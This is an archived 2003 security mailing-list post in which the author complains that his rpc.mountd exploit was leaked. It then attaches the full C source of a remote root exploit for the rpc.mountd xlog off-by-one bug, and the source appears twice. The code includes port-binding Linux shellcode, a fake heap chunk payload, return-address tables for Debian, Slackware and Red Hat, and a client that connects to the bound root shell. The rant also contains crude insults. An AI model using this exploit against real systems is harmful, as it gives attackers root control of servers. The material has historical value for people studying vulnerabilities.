[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Lun_mountd.c vs mounty.c
- To: bugtraq@xxxxxxxxxxxxxxxxx, vulnwatch@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx, vuln-dev@xxxxxxxxxxxxxxxxx
- Subject: Lun_mountd.c vs mounty.c
- From: Tobias Klein <tobias.klein@xxxxxxxxx>
- Date: Wed, 17 Sep 2003 15:41:11 +0200
frew min ago i was browsing packetstorm and i cant belive my eyes
anyone has changed a half haeder of my code and disclosures it to packetstorm
i cant understand why pplz does that
are they not able to got there own skills
i have investigate many hours to write this code and it should never released
but some sucker leaked it and some other gay changes the half haeder and
disclosures it
attached is the ORGINAL EXPLOIT code i wrote months ago
newroot/*
* UNPUBLISHED SOURCE CODE *** UNPUBLISHED SOURCE CODE *** UNPUBLISHED SOURCE
CODE ***
* Private research matrial you dont shoult to have this !!!
*
* remote rpc.mountd exploit for the recent xlog vunl
* written by newroot :)
*
* attached is a full working REMOTE ROOT EXPLOIT for any debians rpc.mountd
* thats compiled with gcc 2.95.4
*
* ive written this couse the security industry has stolen our wonderful off by
one bugs
* maybee its the last time i exploit one of the wonderfull of-by-ones
*
* so greetings goes first to:
* Janusz Niewiadomski -- founder of the bug (public)
* klog -- brougt us the off by one
techniqe
* ^sq -- founds some bugs in the
xploitcode and brings us more offsets
* sorbo -- i recode my exploit as i saw
his xdr things
* so many creditz goes to him
* newroot -- [www.newroot.de]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <rpc/rpc.h>
#include <rpc/clnt.h>
#include <rpc/xdr.h>
#include <rpcsvc/mount.h>
#define BUFSIZE 1024
#define ALIGN 1
int connect_host(char *, int);
void shell(int);
void do_xp(char *, int);
extern char *optarg;
extern int optind, opterr, optopt;
struct _targets {
char desc[2048];
int align;
unsigned long ret_loc;
unsigned long ret_addr;
} targets[] = {
{ "devel",
1,
0xbfffe000,
0x66666666
},
{ "Debian 3.0(x86)",
1,
0xbfffe000,
0x0805b018
},
{ "Slackware 8.1(x86)",
3,
0xbfffdf00,
0x0805d17c
},
{ "Redhat 6.2(x86)",
3,
0xbfffe300,
0x0805d8f8
},
{ 0x00, 0x00 , 0x00}
};
struct fakechunk
{
uint32_t prev_size;
uint32_t size;
uint32_t junk;
uint32_t bk;
uint32_t fd;
};
int verbose; /* extra output */
int align; /* padding */
int t; /* targetnumber */
unsigned long ret_addr;
unsigned long ret_loc;
unsigned char shellcode[] =
// port 12321 - linux shellcode
"\xeb\x0a""dont tell!"
"\x55\x89\xe5\x31\xc0\x66\xc7\x45\xf2\x30"
"\x21\x89\x45\xf4\x89\x45\xf8\x89\x45\xfc"
"\x89\x45\xe8\xfe\xc0\x89\xc3\x89\x45\xe4"
"\xfe\xc0\x66\x89\x45\xf0\x89\x45\xe0\xb0"
"\x66\x8d\x4d\xe0\xcd\x80\x89\x45\xe0\xb0"
"\x66\xfe\xc3\x8d\x55\xf0\x89\x55\xe4\x31"
"\xd2\xb2\x42\x80\xea\x32\x89\x55\xe8\x8d"
"\x4d\xe0\xcd\x80\xb0\x66\xfe\xc3\xfe\xc3"
"\xfe\xc3\x89\x5d\xe4\xfe\xcb\x8d\x4d\xe0"
"\xcd\x80\xb0\x66\xfe\xc3\x31\xd2\x89\x55"
"\xe4\x8d\x4d\xe0\xcd\x80\x89\xd9\x89\xc3"
"\xfe\xc9\xfe\xc9\xfe\xc9\x31\xc0\xb0\x3f"
"\xcd\x80\xfe\xc1\xe2\xf4\x51\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
"\x89\xe2\x53\x89\xe1\x31\xc0\xb0\x3d\x2c"
"\x32\xcd\x80";
void help () {
fprintf (stderr, "remote rpc.mountd exploit\n");
fprintf (stderr, "written by newroot\n");
fprintf (stderr, "---------------------\n");
fprintf (stderr, "ussage: %s [options] <dest>\n\n", "mounty");
fprintf (stderr, "options are:\n");
fprintf (stderr, "\t-t <num>\t# target type use 0 for list\n");
fprintf (stderr, "\t-a <num>\t# align\n");
fprintf (stderr, "\t-l <loc>\t# return localtion 0xdeadface\n");
fprintf (stderr, "\t-b <addy>\t# return adress 0xdeadface\n");
fprintf (stderr, "\t-v\t\t# verbose output\n\n");
}
void print_targets () {
int i;
fprintf (stdout, "Supported targets:\n");
for (i=0; targets[i].ret_addr != 0; i++) {
fprintf (stdout, "\t%i) - %s\n", i+1, targets[i].desc);
}
}
int connect_host(char * host,int port)
{
struct sockaddr_in addr;
struct hostent *he;
int sock;
he=gethostbyname(host);
if (he==NULL) return EXIT_FAILURE;
sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock==-1) return EXIT_FAILURE;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
return sock;
}
void shell(int thesock)
{
fd_set fds;
char buff[1024], *cmd="/bin/uname -a;/usr/bin/id;\n";
int n;
FD_ZERO(&fds);
FD_SET(thesock, &fds);
FD_SET(0, &fds);
send(thesock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(thesock,&fds);
FD_SET(0,&fds);
if(select(thesock+1,&fds, NULL, NULL, NULL)<0)
break;
if( FD_ISSET(thesock, &fds) ) {
if(!(n=recv(thesock,buff,sizeof(buff),0))) {
exit(EXIT_FAILURE);
}
if (!write (1, buff, n))
break;
}
if ( FD_ISSET(0, &fds) ) {
n = read (0, buff, sizeof(buff));
if(n <= 0){
fprintf(stderr,"EOF\n");
exit(EXIT_FAILURE);
}
if(send(thesock,buff,n,0)<0) break;
}
}
fprintf(stderr,"done.\n");
exit(EXIT_SUCCESS);
}
/** trick from sorbos one creditz to him**/
bool_t xdr_dirpath(XDR *xdrs, dirpath *objp) {
return xdr_string(xdrs, objp, MNTPATHLEN);
}
void do_xp(char *host, int t) {
int thesock;
struct sockaddr_in sin;
struct hostent *he;
struct timeval tv;
CLIENT *client; /* rpc/clnt.h */
dirpath DIR;
fhstatus *fh;
struct fakechunk chunk;
int *ptr;
char payload[BUFSIZE+1];
chunk.prev_size = 0xfffffffc;
chunk.size = 0xfffffffc;
chunk.junk = 0xbfffffa1;
memset (payload, 0x41, sizeof(payload));
payload[0] = '/';
payload[BUFSIZE]= 0x00;
for(ptr = (int *)((char*)payload+targets[t].align+300);
ptr < (int*)(payload+sizeof(payload)-6); ptr++)
{
*ptr = targets[t].ret_addr+4+8;
}
chunk.bk = (targets[t].ret_loc)+4-12;
chunk.fd = (targets[t].ret_addr)+40;
memcpy(payload+4,&chunk,sizeof(chunk));
memcpy(payload+40,shellcode,strlen(shellcode));
he=gethostbyname(host);
if (he==NULL) exit(EXIT_FAILURE);
memcpy(&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_port = 0;
sin.sin_family = AF_INET;
fprintf (stdout, "[*] target host: %s\n", host);
fprintf (stdout, "[*] target ip : %s\n",
inet_ntoa(sin.sin_addr.s_addr));
thesock = RPC_ANYSOCK;
client = clnttcp_create(&sin, MOUNTPROG, MOUNTVERS, &thesock, 0, 0);
if (!client) {
fprintf (stdout, "[-] Exploit Failed!\n");
exit (EXIT_FAILURE);
}
client->cl_auth = authunix_create_default();
tv.tv_sec = 6;
tv.tv_usec = 0;
DIR = payload;
fprintf (stdout, "[*] Sending exploit!\n");
// fh = mountproc_mnt_1 (&DIR, client);
if(clnt_call(client, MOUNTPROC_MNT, (xdrproc_t) xdr_dirpath,
(void *)&DIR,(xdrproc_t) xdr_void, NULL,tv) ==
RPC_SUCCESS) {
exit(EXIT_FAILURE);
}
}
int main (int argc, char **argv) {
char c;
int opterr = 0;
int thesock;
while ((c = getopt(argc, argv, "t:a:l:b:vh")) != EOF) {
switch (c) {
case 't':
t = atoi (optarg);
if (t == 0) {
print_targets();
return EXIT_SUCCESS;
} else { --t; }
break;
case 'a':
align = atoi (optarg);
break;
case 'l':
sscanf (optarg, "%x" , &ret_loc);
break;
case 'b':
sscanf (optarg, "%x" , &ret_addr);
break;
case 'v':
++verbose;
break;
default:
help ();
return EXIT_SUCCESS;
break;
}
}
if (argc < 2 ) {
help();
return EXIT_FAILURE;
}
fprintf (stderr, "rpc.mountd remote exploit -- written by newroot!\n");
fprintf(stdout, "[*] Ok going to exploit something...\n");
if (ret_loc) {
if (verbose) {
printf ("[*] setting return-location to %#x\n",
ret_loc);
}
targets[t].ret_loc = ret_loc;
}
if (ret_addr) {
if (verbose) {
printf ("[*] setting return-adress to %#x\n",
ret_addr);
}
targets[t].ret_addr = ret_addr;
}
if (align) {
if (verbose) {
printf ("[*] align to %#x\n", align);
}
targets[t].align = align;
}
do_xp(argv[(argc-1)], t);
thesock = connect_host (argv[argc-1], 12321);
if (thesock > 3) {
fprintf(stdout, "[*] Exploit successful !!!\n");
fprintf(stdout, "[*] waiting for shell ...\n");
shell(thesock);
} else {
fprintf(stderr, "[-] Failed!\n");
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
/*
* UNPUBLISHED SOURCE CODE *** UNPUBLISHED SOURCE CODE *** UNPUBLISHED SOURCE
CODE ***
* Private research matrial you dont shoult to have this !!!
*
* remote rpc.mountd exploit for the recent xlog vunl
* written by newroot :)
*
* attached is a full working REMOTE ROOT EXPLOIT for any debians rpc.mountd
* thats compiled with gcc 2.95.4
*
* ive written this couse the security industry has stolen our wonderful off by
one bugs
* maybee its the last time i exploit one of the wonderfull of-by-ones
*
* so greetings goes first to:
* Janusz Niewiadomski -- founder of the bug (public)
* klog -- brougt us the off by one
techniqe
* ^sq -- founds some bugs in the
xploitcode and brings us more offsets
* sorbo -- i recode my exploit as i saw
his xdr things
* so many creditz goes to him
* newroot -- [www.newroot.de]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <rpc/rpc.h>
#include <rpc/clnt.h>
#include <rpc/xdr.h>
#include <rpcsvc/mount.h>
#define BUFSIZE 1024
#define ALIGN 1
int connect_host(char *, int);
void shell(int);
void do_xp(char *, int);
extern char *optarg;
extern int optind, opterr, optopt;
struct _targets {
char desc[2048];
int align;
unsigned long ret_loc;
unsigned long ret_addr;
} targets[] = {
{ "devel",
1,
0xbfffe000,
0x66666666
},
{ "Debian 3.0(x86)",
1,
0xbfffe000,
0x0805b018
},
{ "Slackware 8.1(x86)",
3,
0xbfffdf00,
0x0805d17c
},
{ "Redhat 6.2(x86)",
3,
0xbfffe300,
0x0805d8f8
},
{ 0x00, 0x00 , 0x00}
};
struct fakechunk
{
uint32_t prev_size;
uint32_t size;
uint32_t junk;
uint32_t bk;
uint32_t fd;
};
int verbose; /* extra output */
int align; /* padding */
int t; /* targetnumber */
unsigned long ret_addr;
unsigned long ret_loc;
unsigned char shellcode[] =
// port 12321 - linux shellcode
"\xeb\x0a""dont tell!"
"\x55\x89\xe5\x31\xc0\x66\xc7\x45\xf2\x30"
"\x21\x89\x45\xf4\x89\x45\xf8\x89\x45\xfc"
"\x89\x45\xe8\xfe\xc0\x89\xc3\x89\x45\xe4"
"\xfe\xc0\x66\x89\x45\xf0\x89\x45\xe0\xb0"
"\x66\x8d\x4d\xe0\xcd\x80\x89\x45\xe0\xb0"
"\x66\xfe\xc3\x8d\x55\xf0\x89\x55\xe4\x31"
"\xd2\xb2\x42\x80\xea\x32\x89\x55\xe8\x8d"
"\x4d\xe0\xcd\x80\xb0\x66\xfe\xc3\xfe\xc3"
"\xfe\xc3\x89\x5d\xe4\xfe\xcb\x8d\x4d\xe0"
"\xcd\x80\xb0\x66\xfe\xc3\x31\xd2\x89\x55"
"\xe4\x8d\x4d\xe0\xcd\x80\x89\xd9\x89\xc3"
"\xfe\xc9\xfe\xc9\xfe\xc9\x31\xc0\xb0\x3f"
"\xcd\x80\xfe\xc1\xe2\xf4\x51\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
"\x89\xe2\x53\x89\xe1\x31\xc0\xb0\x3d\x2c"
"\x32\xcd\x80";
void help () {
fprintf (stderr, "remote rpc.mountd exploit\n");
fprintf (stderr, "written by newroot\n");
fprintf (stderr, "---------------------\n");
fprintf (stderr, "ussage: %s [options] <dest>\n\n", "mounty");
fprintf (stderr, "options are:\n");
fprintf (stderr, "\t-t <num>\t# target type use 0 for list\n");
fprintf (stderr, "\t-a <num>\t# align\n");
fprintf (stderr, "\t-l <loc>\t# return localtion 0xdeadface\n");
fprintf (stderr, "\t-b <addy>\t# return adress 0xdeadface\n");
fprintf (stderr, "\t-v\t\t# verbose output\n\n");
}
void print_targets () {
int i;
fprintf (stdout, "Supported targets:\n");
for (i=0; targets[i].ret_addr != 0; i++) {
fprintf (stdout, "\t%i) - %s\n", i+1, targets[i].desc);
}
}
int connect_host(char * host,int port)
{
struct sockaddr_in addr;
struct hostent *he;
int sock;
he=gethostbyname(host);
if (he==NULL) return EXIT_FAILURE;
sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock==-1) return EXIT_FAILURE;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
return sock;
}
void shell(int thesock)
{
fd_set fds;
char buff[1024], *cmd="/bin/uname -a;/usr/bin/id;\n";
int n;
FD_ZERO(&fds);
FD_SET(thesock, &fds);
FD_SET(0, &fds);
send(thesock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(thesock,&fds);
FD_SET(0,&fds);
if(select(thesock+1,&fds, NULL, NULL, NULL)<0)
break;
if( FD_ISSET(thesock, &fds) ) {
if(!(n=recv(thesock,buff,sizeof(buff),0))) {
exit(EXIT_FAILURE);
}
if (!write (1, buff, n))
break;
}
if ( FD_ISSET(0, &fds) ) {
n = read (0, buff, sizeof(buff));
if(n <= 0){
fprintf(stderr,"EOF\n");
exit(EXIT_FAILURE);
}
if(send(thesock,buff,n,0)<0) break;
}
}
fprintf(stderr,"done.\n");
exit(EXIT_SUCCESS);
}
/** trick from sorbos one creditz to him**/
bool_t xdr_dirpath(XDR *xdrs, dirpath *objp) {
return xdr_string(xdrs, objp, MNTPATHLEN);
}
void do_xp(char *host, int t) {
int thesock;
struct sockaddr_in sin;
struct hostent *he;
struct timeval tv;
CLIENT *client; /* rpc/clnt.h */
dirpath DIR;
fhstatus *fh;
struct fakechunk chunk;
int *ptr;
char payload[BUFSIZE+1];
chunk.prev_size = 0xfffffffc;
chunk.size = 0xfffffffc;
chunk.junk = 0xbfffffa1;
memset (payload, 0x41, sizeof(payload));
payload[0] = '/';
payload[BUFSIZE]= 0x00;
for(ptr = (int *)((char*)payload+targets[t].align+300);
ptr < (int*)(payload+sizeof(payload)-6); ptr++)
{
*ptr = targets[t].ret_addr+4+8;
}
chunk.bk = (targets[t].ret_loc)+4-12;
chunk.fd = (targets[t].ret_addr)+40;
memcpy(payload+4,&chunk,sizeof(chunk));
memcpy(payload+40,shellcode,strlen(shellcode));
he=gethostbyname(host);
if (he==NULL) exit(EXIT_FAILURE);
memcpy(&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_port = 0;
sin.sin_family = AF_INET;
fprintf (stdout, "[*] target host: %s\n", host);
fprintf (stdout, "[*] target ip : %s\n",
inet_ntoa(sin.sin_addr.s_addr));
thesock = RPC_ANYSOCK;
client = clnttcp_create(&sin, MOUNTPROG, MOUNTVERS, &thesock, 0, 0);
if (!client) {
fprintf (stdout, "[-] Exploit Failed!\n");
exit (EXIT_FAILURE);
}
client->cl_auth = authunix_create_default();
tv.tv_sec = 6;
tv.tv_usec = 0;
DIR = payload;
fprintf (stdout, "[*] Sending exploit!\n");
// fh = mountproc_mnt_1 (&DIR, client);
if(clnt_call(client, MOUNTPROC_MNT, (xdrproc_t) xdr_dirpath,
(void *)&DIR,(xdrproc_t) xdr_void, NULL,tv) ==
RPC_SUCCESS) {
exit(EXIT_FAILURE);
}
}
int main (int argc, char **argv) {
char c;
int opterr = 0;
int thesock;
while ((c = getopt(argc, argv, "t:a:l:b:vh")) != EOF) {
switch (c) {
case 't':
t = atoi (optarg);
if (t == 0) {
print_targets();
return EXIT_SUCCESS;
} else { --t; }
break;
case 'a':
align = atoi (optarg);
break;
case 'l':
sscanf (optarg, "%x" , &ret_loc);
break;
case 'b':
sscanf (optarg, "%x" , &ret_addr);
break;
case 'v':
++verbose;
break;
default:
help ();
return EXIT_SUCCESS;
break;
}
}
if (argc < 2 ) {
help();
return EXIT_FAILURE;
}
fprintf (stderr, "rpc.mountd remote exploit -- written by newroot!\n");
fprintf(stdout, "[*] Ok going to exploit something...\n");
if (ret_loc) {
if (verbose) {
printf ("[*] setting return-location to %#x\n",
ret_loc);
}
targets[t].ret_loc = ret_loc;
}
if (ret_addr) {
if (verbose) {
printf ("[*] setting return-adress to %#x\n",
ret_addr);
}
targets[t].ret_addr = ret_addr;
}
if (align) {
if (verbose) {
printf ("[*] align to %#x\n", align);
}
targets[t].align = align;
}
do_xp(argv[(argc-1)], t);
thesock = connect_host (argv[argc-1], 12321);
if (thesock > 3) {
fprintf(stdout, "[*] Exploit successful !!!\n");
fprintf(stdout, "[*] waiting for shell ...\n");
shell(thesock);
} else {
fprintf(stderr, "[-] Failed!\n");
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}